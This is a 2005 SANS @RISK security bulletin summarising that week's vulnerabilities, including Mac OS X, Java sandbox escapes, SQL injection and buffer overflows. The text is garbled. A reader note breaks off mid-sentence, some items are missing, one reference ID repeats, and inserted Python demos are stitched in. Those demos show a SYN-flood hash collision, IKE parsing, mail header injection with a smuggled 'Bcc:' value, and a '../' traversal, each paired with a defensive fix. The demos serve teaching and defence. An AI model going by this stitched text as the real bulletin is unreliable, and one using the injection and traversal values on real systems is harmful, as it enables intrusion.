
@RISK: The Consensus Security Vulnerability Alert

Volume: IV, Issue: 48
December 2, 2005

This was one of the biggest weeks of all of 2005 in terms of the number of new vulnerabilities discovered: over 130.

Two critical vulnerabilities in Mac OS X were patched by Apple as part of this week's Security Update. Also, in the description of the Apple update, we've included a comment from a Mac user about Mac OS X being included in the SANS Top 20.

Alan

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week (numbers in parentheses are the corresponding Part I item numbers):

    Category                    # of Updates & Vulnerabilities
    Windows                     1 (#4, #5)
    Third Party Windows Apps    4
    Mac OS                      1 (#1)
    Linux                       4
    Unix                        2
    Novell                      1
    Cross Platform              22 (#2, #3)
    Web Application             95
    Network Device              3
    Hardware                    1

**************************** Sponsored Links: ***************************

1) 14-Day Free Trial of QualysGuard - the most accurate On Demand Vulnerability Management Solution. http://www.sans.org/info.php?id=947

2) SANS Webcast: Learn how Banco Santander stays ahead of the threat with IPS solutions from Internet Security Systems. http://www.sans.org/info.php?id=948

3) New eBook: "The Definitive Guide to Information Theft Prevention". Security author Dan Sullivan discusses tactics & technologies to prevent information theft. http://www.sans.org/info.php?id=949

**************************************************************************

Table Of Contents

PART I -- Critical Vulnerabilities
    Widely Deployed Software
PART II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
    Windows
    Third Party Windows Apps
    Mac OS
    Linux
    Unix
    Novell
    Cross Platform
    Web Application
    Network Device
    Hardware

Part I is compiled by Rohit Dhamankar at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (1) HIGH: Apple Security Update 2005-009
  • Affected:
    • Mac OS X versions 10.3.9 and 10.4.3
  • Description: Apple released a security update for Mac OS X that addresses a number of vulnerabilities. The important issues fixed by this update are a buffer overflow in CoreFoundation that can be triggered by a specially crafted URL, and remote code execution flaws in the Safari browser. The technical details required to exploit the flaws have not been posted publicly yet.

  • Status: Apply the update released by Apple on November 29, 2005.

  • Council Site Actions: A few of the council sites are running the affected software. One site is deploying the update now; several other sites will deploy after they complete the QA process. Note to readers (from Alan). You may have noticed the inclusion of Mac OS X in the SANS Top 20 and the resulting outcries. We thought you might enjoy the following note from someone who apparently believes that Mac security should never be questioned. I've changed some words to

  • (3) MODERATE: Sun Java JRE Sandbox Security Bypass
  • Affected:
    • JDK and JRE version 5.0 Update 3 and prior for Windows, Solaris and Linux
    • SDK and JRE 1.3.1_15 and prior
    • SDK and JRE 1.4.2_08 and prior
  • Description: The Sun Java Runtime Environment (JRE) enables applets on websites to run on a client's browser. The Java Security Manager controls the resources a downloaded applet can access ("sandbox" model). Multiple vulnerabilities in the Sun JRE can be exploited by a malicious applet to break out of this "sandbox", and access any local resources. As a result, if a user browses a webpage containing the malicious applet, the applet may be able to execute arbitrary commands on the client system with the privileges of the logged-on user. Note that applets are automatically downloaded and executed in typical browser configurations. The technical details about the flaws have not been publicly posted yet.

  • Status: Sun confirmed. Upgrade to SDK and JRE 1.3.1_16, SDK and JRE 1.4.2_09, or JDK and JRE 5.0 Update 4. You can download the software from http://www.java.com/en/download/manual.jsp

  • Council Site Actions: All of the council sites are responding to this item. They all plan to distribute the patch during their next regularly scheduled system update process. One site commented that they will also "lock down" desktops that are running applications requiring older, broken versions of Java.

Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 48, 2005

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 4701 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.


  • 05.48.1 - CVE: Not Available
  • Platform: Windows
  • Title: Windows SynAttackProtect Predictable Hash Remote Denial of Service
  • Description: Microsoft Windows allows administrators to defend against TCP/IP SYN attacks by adding the "SynAttackProtect" value to the "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" registry key. The vulnerability arises from a design error in the function responsible for managing the hash table of half-open connections. Reports indicate that the affected function used by the TCP/IP stack creates a predictable hash because only a few fields of the incoming SYN packet are employed in the hash computation, so an attacker can send SYN packets that all land in the same hash chain. For a list of vulnerable versions please visit the reference link provided.
  • Ref: http://www.securityfocus.com/bid/15613
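The entry above does not say which SYN fields the Windows hash covers, so the following is a model rather than Microsoft's code: an added example (not from the advisory or from Windows) that buckets half-open connections by an unkeyed hash of the victim's address and port in one table, and by a keyed hash of the full 4-tuple in the other, then measures the longest chain a spoofed SYN flood produces. BOOT_SECRET, the bucket count and the flood generator are assumptions constructed for the demonstration.

```python
"""Added example (not Microsoft's code): why an unkeyed hash over too few
SYN-packet fields lets a flood collapse the half-open connection table into
one chain. The bucket functions are stand-in models, not the real TCP/IP
stack; the only claim taken from the advisory is that few fields were hashed."""
import hashlib
import random
from collections import Counter

BUCKETS = 1024
# ASSUMPTION: a per-boot secret the remote attacker cannot learn.
BOOT_SECRET = bytes(range(16))


def weak_bucket(src_ip, src_port, dst_ip, dst_port):
    """Models the flaw: unkeyed hash over server-side fields only, so every
    SYN aimed at one listener hashes to the same bucket."""
    h = 0
    for b in dst_ip + dst_port.to_bytes(2, "big"):
        h = (h * 31 + b) & 0xFFFFFFFF
    return h % BUCKETS


def keyed_bucket(src_ip, src_port, dst_ip, dst_port):
    """Keyed hash over the full 4-tuple: without the key the attacker cannot
    choose source addresses and ports that collide."""
    msg = (src_ip + src_port.to_bytes(2, "big")
           + dst_ip + dst_port.to_bytes(2, "big"))
    digest = hashlib.blake2b(msg, key=BOOT_SECRET, digest_size=4).digest()
    return int.from_bytes(digest, "big") % BUCKETS


def longest_chain(bucket_fn, count=10000, seed=1):
    """Constructed SYN flood: spoofed random sources, one victim listener.
    Returns the longest bucket chain the stack would have to walk per SYN."""
    rng = random.Random(seed)
    victim_ip, victim_port = bytes([10, 0, 0, 1]), 80
    chains = Counter()
    for _ in range(count):
        src_ip = bytes(rng.randrange(256) for _ in range(4))
        src_port = rng.randrange(1024, 65536)
        chains[bucket_fn(src_ip, src_port, victim_ip, victim_port)] += 1
    return max(chains.values())


if __name__ == "__main__":
    print("unkeyed, few fields:", longest_chain(weak_bucket))   # 10000
    print("keyed, full 4-tuple:", longest_chain(keyed_bucket))  # well under 100
```

Run stand-alone it prints the longest chain for each table: all 10000 spoofed SYNs land in a single bucket under the unkeyed hash, while the keyed hash spreads them evenly. The lesson is general: any hash table indexed by attacker-controlled data needs a secret in the hash, or the attacker can choose inputs that collide.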

  • 05.48.2 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: SpeedProject Multiple Products File Extraction Remote Buffer Overflow Vulnerabilities
  • Description: SpeedProject offers various compression utilities such as SpeedCommander, ZipStar, and Squeez for Microsoft Windows platforms. Multiple products by SpeedProject are affected by remote buffer overflow vulnerabilities. These issues arise because the applications fail to perform boundary checks prior to copying user-supplied data into sensitive process buffers. For a list of vulnerable software and versions please visit the reference link provided.
  • Ref: http://www.securityfocus.com/bid/15554

  • 05.48.3 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: MailEnable IMAP Rename Request Remote Denial of Service
  • Description: MailEnable is a commercially available mail server. It is prone to a remote denial of service issue because the application fails to handle exceptional conditions in a proper manner. Remote attackers can exploit this issue to trigger a denial of service condition. MailEnable Professional 1.7 and MailEnable Enterprise 1.1 are reportedly affected.
  • Ref: http://www.securityfocus.com/bid/15556/info

  • 05.48.4 - CVE: CVE-2005-3812
  • Platform: Third Party Windows Apps
  • Title: freeFTPd Multiple Denial of Service Vulnerabilities
  • Description: freeFTPd is an FTP/SFTP server. It is vulnerable to multiple remote denial of service issues due to insufficient handling of user-supplied input to the "PORT" and "PASV" commands. freeFTPd version 1.0.10 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/15557

  • 05.48.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: pcAnywhere Authentication Denial of Service
  • Description: Symantec pcAnywhere is a remote host control application. It is vulnerable to a denial of service due to a buffer overflow prior to authentication. Symantec pcAnywhere versions 11.5.1 and earlier are vulnerable.
  • Ref: http://www.symantec.com/avcenter/security/Content/2005.11.29.html

  • 05.48.6 - CVE: CVE-2005-2088, CVE-2005-2700, CVE-2005-2757, CVE-2005-3185, CVE-2005-3700, CVE-2005-2969, CVE-2005-3701, CVE-2005-2491, CVE-2005-3702, CVE-2005-3703, CVE-2005-3705, CVE-2005-1993, CVE-2005-3704
  • Platform: Mac Os
  • Title: Apple Mac OS X Security Update 2005-009 Multiple Vulnerabilities
  • Description: Apple has released Security Update 2005-009 to address multiple Mac OS X local and remote vulnerabilities. Please see the advisory for details. Apple Mac OS X and Mac OS X Server versions 10.4.3 and earlier are affected (see Part I, item 1).
  • Ref: http://www.securityfocus.com/advisories/9778


  • 05.48.8 - CVE: Not Available
  • Platform: Linux
  • Title: IPsec-Tools IKE Message Handling Denial of Service
  • Description: IPsec-Tools is a port of KAME's IPsec utilities to the Linux 2.6 IPsec implementation. It is prone to a denial of service vulnerability. The problem presents itself when dealing with malformed IKE traffic: in "AGGRESSIVE" mode, the application fails to check for the existence of certain payloads before using them. IPsec-Tools versions 0.6.2 and earlier are vulnerable.
  • Ref: http://www.niscc.gov.uk/niscc/docs/re-20051114-01014.pdf?lang=en
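As an added example (not IPsec-Tools or racoon code), here is a parser for the ISAKMP payload chain with the presence check the entry describes: it walks the generic payload headers from RFC 2408 and, for an aggressive-mode exchange, refuses the message if a required payload type is absent instead of handing a missing payload to later processing. The set of required payloads (SA, KE, NONCE, ID, from the RFC 2409 section 5.4 exchange) and the test messages are assumptions constructed for this demonstration; payload bodies are treated as opaque.

```python
"""Added example (not IPsec-Tools/racoon code): parse an ISAKMP/IKEv1 message's
payload chain and refuse an aggressive-mode message that lacks a required
payload, instead of reaching for a payload that was never sent. Layout is
from RFC 2408 (28-byte header, 4-byte generic payload header)."""
import struct

ISAKMP_HDR = struct.Struct("!8s8sBBBBII")   # cookies, next, ver, exch, flags, msgid, len
PAYLOAD_HDR = struct.Struct("!BBH")          # next payload, reserved, payload length
EXCH_IDENTITY_PROTECTION, EXCH_AGGRESSIVE = 2, 4
SA, KE, ID, NONCE = 1, 4, 5, 10
# ASSUMPTION for this check: the first aggressive-mode message carries SA, KE,
# NONCE and ID payloads (RFC 2409 section 5.4); other payloads are optional.
REQUIRED_AGGRESSIVE = {SA, KE, NONCE, ID}


def parse_payloads(msg):
    """Return (exchange_type, {payload_type: body}); raise on bad framing."""
    if len(msg) < ISAKMP_HDR.size:
        raise ValueError("short ISAKMP header")
    _ic, _rc, next_pl, _ver, exch, _flags, _msgid, length = ISAKMP_HDR.unpack_from(msg)
    if length != len(msg):
        raise ValueError("header length does not match datagram")
    found, off = {}, ISAKMP_HDR.size
    while next_pl != 0:
        if off + PAYLOAD_HDR.size > len(msg):
            raise ValueError("truncated payload header")
        nxt, _res, plen = PAYLOAD_HDR.unpack_from(msg, off)
        if plen < PAYLOAD_HDR.size or off + plen > len(msg):
            raise ValueError("bad payload length")
        found[next_pl] = msg[off + PAYLOAD_HDR.size:off + plen]
        off, next_pl = off + plen, nxt
    return exch, found


def check_aggressive(msg):
    """The check the advisory says was missing: verify presence before use."""
    exch, payloads = parse_payloads(msg)
    if exch != EXCH_AGGRESSIVE:
        return "not aggressive mode"
    missing = REQUIRED_AGGRESSIVE - set(payloads)
    if missing:
        return "reject: missing payload types %s" % sorted(missing)
    return "ok"


def build(exch, payloads):
    """Constructed test message; payloads is a list of (type, opaque body)."""
    body = b""
    for i, (ptype, data) in enumerate(payloads):
        nxt = payloads[i + 1][0] if i + 1 < len(payloads) else 0
        body += PAYLOAD_HDR.pack(nxt, 0, PAYLOAD_HDR.size + len(data)) + data
    first = payloads[0][0] if payloads else 0
    hdr = ISAKMP_HDR.pack(b"\x11" * 8, b"\x00" * 8, first, 0x10, exch, 0, 0,
                          ISAKMP_HDR.size + len(body))
    return hdr + body


if __name__ == "__main__":
    full = build(EXCH_AGGRESSIVE, [(SA, b"\x00" * 8), (KE, b"\x01" * 32),
                                   (NONCE, b"\x02" * 16), (ID, b"\x03" * 8)])
    short = build(EXCH_AGGRESSIVE, [(SA, b"\x00" * 8), (KE, b"\x01" * 32)])
    print(check_aggressive(full), "|", check_aggressive(short))
```

The same parser also rejects a datagram whose header length disagrees with what was received and a payload whose declared length runs past the end, which are the other two ways a malformed IKE message reaches code that assumes the framing is sound.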

  • 05.48.9 - CVE: CVE-2005-3272
  • Platform: Linux
  • Title: Linux Kernel Network Bridge Incorrectly Forwarded Packets Information Disclosure
  • Description: The Linux Kernel is susceptible to an information disclosure vulnerability in its network bridging functionality. When packet filtering on a bridge, packets that are dropped by the packet filter result in an inappropriate bridge forwarding database. Malicious users that send spoofed packets to an affected firewall can cause the forwarding database to be updated in such a fashion that packets that should not normally traverse the bridge are leaked back to the attacker. Kernel versions 2.6.11.11 and prior are vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/15536

  • 05.48.10 - CVE: Not Available
  • Platform: Linux
  • Title: Kadu Remote Denial of Service
  • Description: Kadu is an instant messaging application. It is vulnerable to a denial of service due to insufficient handling of crafted messages with "rich_text" and image basic information from a Gadu-Gadu server. Kadu versions 0.4.2 and 0.5.0pre are vulnerable.
  • Ref: http://www.securityfocus.com/bid/15620

  • 05.48.11 - CVE: Not Available
  • Platform: Unix
  • Title: Opera Web Browser Arbitrary Command Execution
  • Description: Opera Web Browser is affected by an arbitrary command execution vulnerability. This issue arises due to insufficient sanitization of user-supplied data. A remote attacker could exploit this to gain unauthorized access. Opera 8.50 and prior versions running on Unix and Linux platforms are vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/15521/info

  • 05.48.12 - CVE: CVE-2005-3833, CVE-2005-3834
  • Platform: Unix
  • Title: Tunez Multiple Input Validation Vulnerabilities
  • Description: Tunez is a freely available, open source web MP3 jukebox. Tunez is prone to multiple input validation vulnerabilities. Tunez version 1.21 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/tunez-sql-and-xss-vuln.html

  • 05.48.13 - CVE: Not Available
  • Platform: Novell
  • Title: Novell ZENworks Remote Diagnostics Console One Unauthorized Access
  • Description: Novell ZENworks Remote Diagnostics is prone to an unauthorized access issue. Specific details about this vulnerability are currently unavailable. Please check the advisory link mentioned below. Novell ZENworks for Servers version 3.0.2 IR4 has been released to fix this issue.
  • Ref: http://www.securityfocus.com/bid/15540

  • 05.48.14 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IPUpdate Remote Buffer Overflow
  • Description: IPUpdate is used to update domains with an IP address taken from pluggable external tools. It is prone to a buffer overflow vulnerability because the application fails to perform boundary checks prior to copying user-supplied data into finite sized process buffers. A remote attacker could exploit this issue to execute arbitrary code. IPUpdate versions prior to 1.1.0 are affected by this issue.
  • Ref: http://www.securityfocus.com/bid/15534/info


  • 05.48.16 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Inkscape SVG Image Buffer Overflow
  • Description: Inkscape is an Open Source drawing tool that uses the W3C standard SVG format. It is prone to a buffer overflow vulnerability due to a failure in the application to do proper bounds checking on user-supplied data before copying it into a finite sized buffer. Inkscape versions 0.42 and 0.41 are affected.
  • Ref: http://www.securityfocus.com/bid/15507/exploit

  • 05.48.17 - CVE: CVE-2005-3745
  • Platform: Cross Platform
  • Title: Apache Struts Error Response Cross-Site Scripting
  • Description: Struts is an open source framework for building Web applications. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input. Apache Struts version 1.2.7 is vulnerable.
  • Ref: http://www.hacktics.com/AdvStrutsNov05.html

  • 05.48.18 - CVE: CVE-2005-3632
  • Platform: Cross Platform
  • Title: NetPBM pnmtopng Long Text Line Buffer Overflow
  • Description: NetPBM is a collection of utilities for the manipulation of graphic images. One of the utilities is pnmtopng, which converts PNM images to PNG images. pnmtopng is susceptible to buffer overflow issues due to a failure of the application to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer. NetPBM versions 9.20 and 10.0 are affected.
  • Ref: http://www.securityfocus.com/bid/15514

  • 05.48.19 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Jetty URL Encoded Backslash Source Code Disclosure
  • Description: Jetty is an Open Source web server and servlet container. Jetty is prone to a source code disclosure vulnerability due to a failure in the web server application to properly handle Web requests. An attacker can exploit this vulnerability to retrieve sensitive information from ".jsp" files by appending a URI encoded backslash "%5C" character at the end of file names. Jetty versions 5.1.5 and earlier are reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/15515/discuss

  • 05.48.20 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Gadu-Gadu Multiple Remote Vulnerabilities
  • Description: Gadu-Gadu is an instant messenger. It is prone to multiple remote vulnerabilities. Gadu-Gadu versions 7.2 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/417328

  • 05.48.21 - CVE: Not Available
  • Platform: Cross Platform
  • Title: WebSphere Application Server Denial of Service
  • Description: IBM WebSphere Application Server for z/OS is prone to a double free vulnerability that may allow attackers to trigger a denial of service condition. This issue results from a design error affecting the "BBOORB" module. WebSphere Application Server for z/OS version 5.0 is affected.
  • Ref: http://www.securityfocus.com/bid/15514

  • 05.48.22 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PHP MB_Send_Mail TO Argument Header Injection
  • Description: The PHP "mb_send_mail()" function is used to send encoded email messages. PHP is susceptible to a header injection vulnerability when sending email. This issue is due to insufficient sanitization of user-supplied input to the "mb_send_mail()" function. This may allow attackers to utilize vulnerable Web applications as an anonymous email proxy. For a list of vulnerable versions please visit the reference link provided.
  • Ref: http://www.securityfocus.com/bid/15571
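The header-injection mechanism, as an added example that is not PHP's mb_send_mail() implementation: Python stands in for a web form handler that copies a request field into the To: header, and the hardened form applies the check that turns the injected Bcc: line back into an error. The injected address, subject and body are constructed for the demonstration.

```python
"""Added example (not PHP's mb_send_mail() code): a CR/LF in a header argument
becomes a second header at the receiving MTA; rejecting line breaks before
the header is assembled stops it."""
from email import message_from_string
from email.utils import parseaddr


def build_vulnerable(to, subject, body):
    """Copies the caller's values into the header block unchecked."""
    return "To: %s\r\nSubject: %s\r\n\r\n%s" % (to, subject, body)


def build_hardened(to, subject, body):
    """Reject any line break in header values and require a parsable mailbox."""
    for name, value in (("To", to), ("Subject", subject)):
        if "\r" in value or "\n" in value:
            raise ValueError("line break in %s header" % name)
    if "@" not in parseaddr(to)[1]:
        raise ValueError("To is not a mailbox address")
    return "To: %s\r\nSubject: %s\r\n\r\n%s" % (to, subject, body)


def header_names(raw):
    """What a receiving MTA would see as the header block."""
    return list(message_from_string(raw).keys())


if __name__ == "__main__":
    # Constructed attacker input: the request field carries a second header.
    injected = "victim@example.com\r\nBcc: list@example.net"
    print(header_names(build_vulnerable(injected, "hi", "body")))   # ['To', 'Bcc', 'Subject']
    try:
        build_hardened(injected, "hi", "body")
    except ValueError as err:
        print("rejected:", err)
```

A bare LF is enough for most MTAs, so the check must cover both "\r" and "\n"; the Subject is validated the same way because any header that carries request data is an injection point, not just the recipient.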

  • 05.48.23 - CVE: Not Available
  • Platform: Cross Platform
  • Title: unalz Archive Filename Buffer Overflow
  • Description: unalz is an archiving program. It is vulnerable to a buffer overflow issue that is exposed when the application extracts an ALZ archive that contains a file with a long name. An attacker could exploit this issue to execute arbitrary code in the context of the user who extracts a malicious archive. unalz versions earlier than 0.53 are vulnerable.
  • Ref: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=340842

  • 05.48.24 - CVE: CVE-2005-3875
  • Platform: Cross Platform
  • Title: Enterprise Connector SQL Injection
  • Description: Enterprise Connector is a Web-based conference and messaging application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "messageid" parameter in the "send.php" and "messages.php" scripts. Enterprise Heart Enterprise Connector version 1.0.2 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/enterprise-connector-sql-inj-vuln.html

  • 05.48.25 - CVE: Not Available
  • Platform: Cross Platform
  • Title: ktools Remote Buffer Overflow
  • Description: ktools is a library that provides various text-mode user interface controls. It is prone to a remote buffer overflow vulnerability when used with centericq and a string containing 1024 or more characters is supplied as a part of a contact's details. This may be exploited through the "description" field of an RSS feed. ktools versions 0.3 and earlier are vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/15600

  • 05.48.26 - CVE: CVE-2005-3870
  • Platform: Cross Platform
  • Title: EdmoBBS SQL Injection
  • Description: EdmoBBS is a Web-based bulletin board application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "table" and "id" parameters of the "edmobbs9r.php" script. EdmoBBS version 0.9 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/edmobbs-sql-inj-vuln.html

  • 05.48.27 - CVE: CVE-2005-3874
  • Platform: Cross Platform
  • Title: Netzbrett P_Entry Parameter SQL Injection
  • Description: Netzbrett is a Web-based bulletin board system. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "p_entry" parameter of the "p_entry" script. Netzbrett version 1.5.1 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/netzbrett-151-sql-inj-vuln.html

  • 05.48.28 - CVE: Not Available
  • Platform: Cross Platform
  • Title: GuppY Remote File Include and Command Execution
  • Description: GuppY is Web portal software implemented in PHP. It is vulnerable to multiple remote file include and command execution issues due to insufficient sanitization of user-supplied input to the "REMOTE_ADDR" variable of the "error.php" script. GuppY versions 4.5.9 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/417899

  • 05.48.29 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Panda Software Antivirus Library ZOO Archive Heap Overflow
  • Description: Panda Software Antivirus products are vulnerable to a heap overflow issue exposed when the antivirus library attempts to decompress ZOO archive files. Successful exploitation will result in execution of arbitrary code in the context of an affected application.
  • Ref: http://www.securityfocus.com/bid/15616

  • 05.48.30 - CVE: Not Available
  • Platform: Cross Platform
  • Title: NuFW Malformed Packet Remote Denial of Service
  • Description: NuFW is an authenticating network application proxy firewall. It is vulnerable to a remote denial of service issue due to a failure of the application to properly handle malformed network packets from authenticated users. NuFW versions prior to 1.0.16 are affected.
  • Ref: http://www.nufw.org/+NUFW-1-16-minor-security-fix+.html

  • 05.48.31 - CVE: Not Available
  • Platform: Cross Platform
  • Title: KBase Express Multiple SQL Injection Vulnerabilities
  • Description: KBase Express is a knowledge base management application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "id" parameter of the "category.php" script and other unspecified parameters. KBase Express versions 1.0.0 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/kbase-express-sql-inj-vuln.html

  • 05.48.32 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Opera Web Browser JNI Routine Handling Remote Denial of Service
  • Description: Opera Web Browser is prone to a remote denial of service vulnerability. The issue presents itself when the browser handles a Java applet containing a Java Native Interface (JNI) routine implementing the com.opera.JSObject class. Opera version 8.50 is reportedly vulnerable.
  • Ref: http://www.securityfocus.com/bid/15648

  • 05.48.33 - CVE: CVE-2005-3694
  • Platform: Cross Platform
  • Title: Centericq Malformed Packet Handling Remote Denial of Service
  • Description: Centericq is a text mode menu and window driven IM interface that supports the ICQ2000, Yahoo!, AIM, IRC, MSN, Gadu-Gadu and Jabber protocols. It is prone to a remote denial of service vulnerability when handling an empty packet on the listening port for ICQ messages.
  • Ref: http://www.securityfocus.com/bid/15649

  • 05.48.34 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Perl Unspecified Format String Vulnerability
  • Description: Perl is vulnerable to a format string issue due to a failure of the programming language to properly handle format specifiers. An attacker may leverage this issue to gain unauthorized remote access.
  • Ref: http://lists.immunitysec.com/pipermail/dailydave/2005-November/002694.html

  • 05.48.35 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java Runtime Environment Multiple Privilege Escalation Vulnerabilities
  • Description: Sun JRE is susceptible to various privilege escalation vulnerabilities. These issues can allow remote Java applications to read/write local files and execute arbitrary applications in the context of an affected user. Please refer to the advisory below for details.
  • Ref: http://www.securityfocus.com/bid/15615

  • 05.48.36 - CVE: CVE-2005-3773, CVE-2005-3772, CVE-2005-3771
  • Platform: Web Application
  • Title: Joomla Multiple Input Validation Vulnerabilities
  • Description: Joomla is web content management software implemented in PHP. It is prone to multiple input validation vulnerabilities. Joomla versions 1.0 through 1.0.3 are vulnerable.
  • Ref: http://www.joomla.org/content/view/499/66/

  • 05.48.37 - CVE: Not Available
  • Platform: Web Application
  • Title: PHPPost Subject HTML Injection
  • Description: PHPPost is a message board application written in PHP. It is prone to an HTML injection vulnerability due to improper sanitization of user-supplied input to the subject field of message posts.
  • Ref: http://www.securityfocus.com/archive/1/417434

  • 05.48.38 - CVE: Not Available
  • Platform: Web Application
  • Title: Torrential Getdox.PHP Directory Traversal
  • Description: Torrential is a BitTorrent tracker application. Insufficient sanitization of the "../" directory traversal sequence exposes the application to a directory traversal issue. Torrential version 1.2 is affected.
  • Ref: http://www.securityfocus.com/bid/15530
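The traversal described above and the containment check that stops it, as an added example that is not Torrential's code. The document-root layout, file names and contents are constructed in a temporary directory for the demonstration; the request parameter name is not taken from the advisory.

```python
"""Added example (not Torrential's code): a document-serving routine that
joins the request parameter onto the document root, beside one that resolves
the path first and requires the result to stay inside the root."""
import os
import tempfile


def vulnerable_path(docroot, name):
    """Joins the request parameter straight onto the document root;
    "../" is never rejected."""
    return os.path.join(docroot, name)


def safe_path(docroot, name):
    """Resolve symlinks and '..' first, then require the result to stay
    inside docroot. An absolute name also fails, since join() would
    otherwise discard docroot entirely."""
    root = os.path.realpath(docroot)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError("request escapes document root: %r" % name)
    return target


def demo():
    """Constructed layout: <tmp>/docs/readme.txt is public, <tmp>/config.php is not."""
    tmp = tempfile.mkdtemp()
    docs = os.path.join(tmp, "docs")
    os.mkdir(docs)
    with open(os.path.join(docs, "readme.txt"), "w") as f:
        f.write("public")
    with open(os.path.join(tmp, "config.php"), "w") as f:
        f.write("db_password")
    result = {}
    with open(vulnerable_path(docs, "../config.php")) as f:
        result["vulnerable_leaks_config"] = f.read() == "db_password"
    try:
        safe_path(docs, "../config.php")
        result["safe_blocks_traversal"] = False
    except PermissionError:
        result["safe_blocks_traversal"] = True
    try:
        safe_path(docs, os.path.join(tmp, "config.php"))
        result["safe_blocks_absolute"] = False
    except PermissionError:
        result["safe_blocks_absolute"] = True
    with open(safe_path(docs, "readme.txt")) as f:
        result["safe_serves_public"] = f.read() == "public"
    return result


if __name__ == "__main__":
    for check, ok in demo().items():
        print(check, ok)
```

commonpath() is used instead of a string prefix test so that a sibling directory such as docs2 is not mistaken for docs, and realpath() runs before the comparison so a symlink inside the root cannot point back out of it.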

  • 05.48.39 - CVE: CVE-2005-3735
  • Platform: Web Application
  • Title: e-Quick Cart Multiple SQL Injection Vulnerabilities
  • Description: Coastal Data Management e-Quick Cart is an e-commerce application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the productid parameter in shopaddtocart.asp, strpemail parameter in shopprojectlogin.asp and id parameter in shoptellafriend.asp. All versions of Coastal Data Management e-Quick Cart are vulnerable.
  • Ref: http://www.frsirt.com/english/advisories/2005/2506

  • 05.48.40 - CVE: Not Available
  • Platform: Web Application
  • Title: APBoard Thread.PHP SQL Injection
  • Description: APBoard is a message board application written in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "start" parameter of the "thread.php" script.
  • Ref: http://www.securityfocus.com/bid/15513

  • 05.48.41 - CVE: Not Available
  • Platform: Web Application
  • Title: PHP Download Manager Files.PHP SQL Injection
  • Description: PHP Download Manager is a file download manager. It is prone to an SQL injection issue due to a failure in the application to properly sanitize user-supplied input to the "cat" parameter of the "files.php" script before using it in an SQL query. A remote attacker could exploit this issue to compromise the application.
  • Ref: http://www.securityfocus.com/bid/15517/info

  • 05.48.42 - CVE: Not Available
  • Platform: Web Application
  • Title: Saturn Innovation Mailing System SQL Injection
  • Description: Saturn Innovation Mailing System is in part used to send forgotten passwords to users by email. It is vulnerable to an SQL injection issue due to a failure in the application to properly sanitize user-supplied input. An attacker could exploit this issue to compromise the application. All current versions of Saturn Innovation Mailing System are vulnerable.
  • Ref: http://www.securityfocus.com/bid/15518/info

  • 05.48.43 - CVE: CVE-2005-3748
  • Platform: Web Application
  • Title: Nuke ET Search Module SQL Injection
  • Description: Nuke ET is a Web portal application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "query" parameter of the "search" module. Tru-Zone Nuke ET versions 3.2 and earlier are vulnerable.
  • Ref: http://lostmon.blogspot.com/2005/11/nuke-et-search-module-query-variable.html

  • 05.48.44 - CVE: Not Available
  • Platform: Web Application
  • Title: PHPPost Multiple Cross-Site Scripting Vulnerabilities
  • Description: PHPPost is a free message board. It is vulnerable to multiple cross-site scripting issues due to a failure in the application to properly sanitize user-supplied input to the "user" parameter of the "profile.php" and "mail.php" scripts. These may facilitate the theft of cookie-based authentication credentials as well as other attacks. PHPPost version 1.0 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/15524/info

  • 05.48.45 - CVE: Not Available
  • Platform: Web Application
  • Title: OTRS Multiple Input Validation Vulnerabilities
